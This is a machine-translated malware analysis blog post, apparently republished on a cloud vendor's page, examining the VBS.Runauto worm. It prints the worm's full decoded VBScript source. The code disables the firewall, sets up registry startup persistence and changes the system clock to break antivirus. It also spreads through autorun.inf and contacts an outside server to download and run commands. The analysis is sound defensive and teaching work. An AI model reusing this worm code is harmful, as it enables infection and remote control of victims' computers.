VBS. Runauto Script Virus Analysis Chapter _vbs

Source: Internet
Author: User
Tags prepare ultraedit
Recently a colleague of the laptop suffered from the virus, just this semester in the computer professional students on VBScript and then by the way analysis.
First from the virus-infected computer to extract the virus samples, because it is temporarily found, and there is no special preparation, the use of WinRAR compressed after saving.
On the experimental machine to open the virus samples of the compressed file, my Symantec 11 immediately to the police, and the virus removed. So you have to disable antivirus software or set up an "exception area" to analyze the virus, so create a new "EvA" folder on your desktop and set it as an antivirus exception folder, where the virus samples lie quietly.
The scripting virus is an interpretive program, so we don't need any special decompile tools to view the source code. Although Windows Notepad is enough, I prefer to use UltraEdit.
Use open UltraEdit to open the virus file as shown in Figure 1, note that in order to prevent the virus from being accidentally triggered, the VBS extension is first modified to TXT.


Figure 1 Virus Script
Open the virus script, you can find that the code is very poor readability, the size of the alphabet disorderly arrangement, and there are many incomprehensible symbols string. In fact, this is the virus in order to save their own and "think" out of the "umbrella."
Virus code case problems can be converted directly to lowercase letters using CTRL+F5 after selecting the text in the UE (hereafter UltraEdit short name). The string of "00c2%0033% ..." that resembles a password is relatively troublesome.
From the virus code can be found as long as "garbled" place will have "StrReverse" and "unescape" function of the call, where "unescape" is VBScript standard function, the role is to pass through the escape function encoded strings to reverse code. Here's a note that because HTML in the Web is reserved for some symbols, such as "<" and ">" symbols, if you need to display them, you need to HTML-encode them, all spaces, punctuation, accent marks, and other non-ASCII characters are used% XX encoding is substituted, where xx equals the hexadecimal number representing the character. For example, a space returns "%20". A character value greater than 255, such as Chinese, is stored in%uxxxx format. In the "password" analysis, found in fact is to escape coded symbol string for the reverse, combined with the "StrReverse" function name, you can conclude that the virus author in order to enable the virus to escape anti-virus software detection, using the key code to encode and reverse storage mode.
It is possible to encode and decode strings directly in the UE, but there is no ready-made tool for string mirroring, and it is very simple to write a page to decode or encode the student, but for the continuity of the narration, the code is as follows:
Copy Code code as follows:

<! DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 transitional//en" "Http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd ">
<meta http-equiv= "Content-type" content= "text/html; Charset=utf-8 "/>
<title> reverse</title> The string
<script type= "Text/javascript" >
function _reverse ()
{
With (document) {
if (rev.order.checked) {
Revedstr = Rev.instr.value.split ("). Reverse (). Join (")
Write ("<strong>reversed string:</strong>", Revedstr, "<br>");
Write ("<strong>unescape string:</strong>", unescape (REVEDSTR), "<br>");
Write ("<strong>escape string:</strong>", Escape (Revedstr), "<br>");
}
else{
Unescapstr = unescape (Rev.instr.value);
Revedstr = Unescapstr.split ("). Reverse (). Join (");
Write ("<strong>uneacape string:</strong>", Unescapstr, "<br/>");
Write ("<strong>reversed string:</strong>", revedstr);

}
}
}
</script>
<body>
<form action= "" method= "POST" name= "Rev" >
<input name= "Order" type= "checkbox" value= "/> Conversion sequence (first reverse decoding)? <br/>
<input name= "InStr" type= "text" value= "Please enter" onmousemove= "This.select ()"/>
<input name= "" "type=" button "value=" onclick= "_reverse ()"/></form>
</body>

Use the tools above to decode the code as follows:
Copy Code code as follows:

On Error Resume Next
Set fso=createobject ("Scripting.FileSystemObject")
Set Wshshell=createobject (StrReverse ("Wscript.Shell"))
Dim dri_list,dri_list0
Dim Issend
Issend=0
C_time=date ()

' This is off sharedaccess (Intemet Connection Sharing and Firewall service).
Wshshell.run "net stop SharedAccess", 0

Set drvs=fso.drives
Sysdir=fso. GetSpecialFolder (1) ' Windowsfolder=0,systemfolder=1, temporaryfolder=2
Thispath=wscript. ScriptFullName
Set Fc=fso. OpenTextFile (thispath,1) ' forreading=1,forwriting=2, forappending=8
Scopy=fc.readall
Fc. Close
Set fc=nothing
' Write registry registration file Sysinfo.reg, registration system boot automatically execute virus
Call WriteFile (sysdir& "\sysinfo.reg", "Windows Registry Editor Version 5.00 [hkey_local_machine\software\policies \microsoft\windows\system\scripts\startup\0\0] "Script" = "%windir%\\system32\\prncfg.vbs" "Parameters" = "" " Exectime "=hex (b): 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows \currentversion\group policy\state\machine\scripts\startup\0\0] "script" = "%windir%\\system32\\prncfg.vbs" Parameters "=" "Exectime" =hex (b): 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
")
' Import Registry Sysinfo.reg
Wshshell.run "regedit/s Sysinfo.reg", 0
Wscript.Sleep 200
Fso.deletefile sysdir& "\sysinfo.reg", True

' If the currently running script is in the system directory
If InStr (thispath,sysdir) >0 Then
Dri_list0=listdrv ()
O_time=left (c_time,3) &cstr (Int (Mid (c_time,4,1)-1) &right (C_time,len (C_time)-4) ' Callback Time 1 years
Wshshell.run "cmd/c Date" &o_time,0
Wscript.Sleep 10000
For Dri_i=1 to Len (DRI_LIST0)
Call Writeauto (Mid (dri_list0,dri_i,1) & ": \")
Next
Wshshell.run "cmd/c Date" &c_time,0

' WMI Application queries computer name, user name
Computername= "": Username= ""
Set objwmiservice=getobject ("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
Set colcomputers = objWMIService.ExecQuery ("SELECT * from Win32_ComputerSystem")
For each objcomputer in Colcomputers
Computername=objcomputer.name
Username=objcomputer.username
Next
If username= "" Then username= "Evar"
If InStr (username, "\") <=0 Then
username=computername& "\" &username
End If
Todo
If issend=0 Then
' Link extranet, get execution code
Set xml=createobject ("Msxml2.serverxmlhttp")
Xml.open "Get", "http://202.119.104.100/zzb/eva/count.asp?a=" &username,0
' http://202.119.104.100/zzb/is a website sponsored by the party organization Department of South Normal University
Xml.setrequestheader "User-agent", "Evar"
Xml.send ()
If err.number=0 Then
Issend=1
Res=xml.responsetext
If UCase (Left (res,7)) =ucase ("execute") Then Execute Res
Else
Err.Clear
End If
Set xml=nothing
End If

Dri_list=listdrv ()
For Dri_k=1 to Len (dri_list)
If InStr (Dri_list0,mid (dri_list,dri_k,1)) <=0 Then
Call Writeauto (Mid (dri_list,dri_k,1) & ": \")
End If
Next
Dri_list0=dri_list
Wscript.Sleep 1000
Loop
Else
Wshshell.run "Explorer. \", 3
Wscript.Sleep 2000
Wshshell.appactivate LCase ("My Computer")
Wshshell.sendkeys UCase ("% c") ' Analog keystroke ALT + space + C, is actually close the window
Runflag=0

' Get the current system process, the application of WMI
For all PS in GetObject _
("Winmgmts:\\.\root\cimv2:win32_process"). Instances_
If LCase (ps.name) =lcase ("Wscript.exe") Then
Runflag=runflag+1
End If
Next
If runflag>=2 Then Wscript.Quit
Set Sf=fso. GetFolder (Sysdir)
F_time=left (Sf.datecreated,instr (sf.datecreated, "")-1)
Wshshell.run "cmd/c Date" &f_time,0
Wscript.Sleep 100
Call WriteFile (Sysdir&lcase ("\prncfg.vbs"), vs (Scopy)
Wshshell.run "cmd/c Date" &c_time,0
Wshshell.run sysdir& "\prncfg.vbs"
End If

' Confusing strings, making code variants!
Function vs (Str)
Execute for I=1 to Len (str) c=ucase (Mid str,i,1) randomize If Int (Rnd () *100) >50 Then vs=vs&lcase (c) Else vs=vs&am P;c End If Next vs=replace (vs,ucase ("%u"), LCase ("%u")) "
End Function

' List drives
Function Listdrv ()
Execute "Dim tmp_list tmp_list=" for each DRV in DRVs if Drv.isready Then tmp_list=tmp_list&drv.driveletter End If Ne XT Listdrv=tmp_list "
End Function

' Write Autorun.inf file
Sub Writeauto (PATH)
' Prepare before writing auto file, if there is a Autorun.inf folder in path, rename it, or delete it if there is a Autorun.inf file
Execute "If fso.folderexists (path&" Autorun.inf ") Then fso.movefolder path&" Autorun.inf ", Path&rnd () ElseIf fso.fileexists (path& "Autorun.inf") Then fso.deletefile "path&", True End If "
' Startup code in the Autorun.inf
Cmdstr= "Shell\*\command=wscript.exe" &AMP;CHR & "Eva.vbs" &AMP;CHR (34)
Autostr= "[Autorun]" &vbcrlf& "open=" &vbcrlf&replace (Cmdstr, "*", "open") &vbcrlf&replace ( CMDSTR, "*", "explore") &vbcrlf&replace (Cmdstr, "*", "find")
' Write
Call WriteFile (Path&ucase ("Autorun.inf"), AUTOSTR)
Call WriteFile (path& "Eva.vbs", vs (Scopy))
End Sub
' Writes the content contents to Fpath and sets the file properties to be ReadOnly, hidden, and system
Sub WriteFile (fpath,content)
Execute "If fso.fileexists (fpath) Then fso.deletefile fpath,true Set fc=fso. OpenTextFile (fpath,2,true) fc.write content FC. Close Set fc=nothing set Fa=fso.getfile (Fpath) fa.attributes=7 set fa=nothing "
End Sub

The code above has added a lot of annotations, and if you can see it here, it's probably going to be a pretty good idea. The code itself is generally encoded in quality, because this code is downloaded from a website of the South Normal University, so it is estimated that it is a student.
In this virus, the author uses a custom vs function to "face" to avoid anti-virus detection, using random method to the virus body case conversion, but in fact, this processing of real anti-virus software is no effect of the J
In this virus, the use of the registry, Windows Autorun, file operations, as well as WMI control technology, these are the current Windows environment mainstream technology. You can see that these technologies are all scripts for Microsoft, in particular, Vbscrit provides a calling interface, technically COM components provide a automation interface to support the invocation of various scripts, originally to allow Windows scripts to do more, but they are also "good" good for the virus services, So we are here to analyze the virus the main purpose is not to write viruses, but to learn programming technology, the use of the technology to facilitate our work and learning. So a friend who wants to learn scripting can make a good analysis of this vivid example.
The above said so much, in fact, still not how detailed said the virus, although I always think that the code is the best explanation, but can not be sorry the title of the "Analysis" of the two words.
In fact, this virus is mainly used by Windows Autorun.inf files running. As a virus, it must be run by the user, either directly or indirectly. When the "ignorant user" double click on the poison U disk and so on, the Autorun.inf file points to the Eva.vbs virus started, first by turning off the "sharedaccess" service to shut down the windows from the firewall, This is primarily to prepare for the subsequent virus being able to communicate with the external puppet Web site.
After shutting down the firewall, the script writes a registry file, which is also a common feature of the virus by importing it into the system later in the code to enable the virus to boot. After the program is started, it needs to determine whether it is currently infected, usually the script is more difficult to handle the current system process, but fortunately, Windows WMI provides a large number of interfaces for scripting Access system functionality, which is used to detect multiple virus processes in the system. If so, it will automatically exit. The main feature of this virus is replication, which is also defined as the cause of worm viruses, but one of the important eigenvalues that I find interesting is that the virus program actually executes a virus command sent from a dummy server.
In this virus, using the ServerXMLHTTP component to communicate with the dummy server, this technique is actually the foundation of our current AJAX technology. To communicate with the server here, and execute the virus code downloaded from the server, which reflects the current virus authors want to be able to long-term control of "broiler", but what I do not understand is that a piece of code in the virus is the user's account of the present computer detection, and the user information sent to the server. Many well-known, the majority of the Chinese version of the operating system D, which this time was noisy "tomato garden" such as the most of the revised windows, such windows have a common point, that is installed systems will use their "brand" as a user name, such as "Tomato garden" Version of Windows default users are often the "tomato garden." From the virus code, it is also to the Windwos version of a "D edition occupancy Census" Mody?
The last thing to mention is that the virus changes the system time, and it is often fatal to attack antivirus software by modifying the system time. Ironically, the virus's authorization time for many anti-virus software becomes illegal just by passing the time forward for a year, as if Windows XP had just been released, setting the wrong time may have caused the system to crash. The wrong time often destroys a seemingly solid system. In this way, Kaspersky's authorization time becomes illegal, and with it comes the anti-virus engine hangs, so that a student virus without the skill and difficulty can go a long way. Isn't that ironic for antivirus vendors? In order to protect their interests (use time authorization), and let users risk being attacked by the virus. In fact, some antivirus vendors are aware of this problem, if the authorization expires should not shut down the killing engine, the most close to the update of the virus library. In addition, the most wonderful time to change the virus is to adjust the time forward instead of because you do not know the different users of the antivirus software authorization time is 1 years or n years, but it can be sure that the time to adjust the way forward for a year, may be the same authorization for people is normal, but for the computer is difficult to understand.
The above is my simple analysis of the virus, mainly talking about the several parts of my interest. To talk about the virus protection, front-end time, I attended a product launch in Nanjing, Symantec, there is a sales in the introduction of their products, which he said a meeting, "Now no one will let their computers streaking!!! ”。 I believe a lot of friends know that the naked running here refers to not install computer anti-virus software computer. In fact, this sales is wrong, I have had more than 1 years of "naked", and the system has not been any problems, not my own said, is later I installed a brand of anti-virus software scan did not find any traces of the virus. As for why later installed, is entirely to test a brand of anti-virus software, and then lazy to delete.
So many friends to say, you are really "God-man." I want to answer the matter, in fact, not "God", you can also do, the key is that you do not do!
From the whole process of running this virus, we can find that basically the key operation is the system administrator level to be successful. For example, modify time, enumerate system processes, read and write to the registry. If you are using a computer account that is just a normal user privilege, I think the virus will not be with you.
In addition, because they like to analyze the virus behavior, which also for me to "escape" the virus found some skills. Because as early as many years ago, I have analyzed the "Happy Time" script virus, was not very familiar with the VBS script, it can be said that the virus let me further understand the ability of the VBS script, for I can later be flexible in the work of the use of scripting to solve the problem to give an inspiration!


Appendix: Symantec's information on the virus
Discovered:march 12, 2007
Updated:march, 2007 5:17:48 PM
Type:worm
Infection length:1,112 bytes
Systems affected:windows, Windows, Windows XP, Windows Me, Windows NT, Windows 2000
VBS. Runauto is a Visual Basic script worm so copies itself in the root folder of all drives (including removable devices) ex CEPT floppy drives.
Protectioninitial Rapid Release version March 13, 2007
Latest Rapid Release version September, 2008 revision 038
Initial Daily certified version March 13, 2007
Latest Daily Certified version September, 2008 revision 039
Initial Weekly Certified Release date March 14, 2007
Click here for a to detailed description of Rapid release and daily certified virus definitions.
Threat Assessmentwildwild Level:low
Number of infections:0-49
Number of sites:0-2
Geographical Distribution:low
Threat Containment:easy
Removal:easy
Damagedamage Level:low
Payload:copies itself to all drives on the compromised computer.
Distributiondistribution Level:low
writeup By:mircea Ciubotariu

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.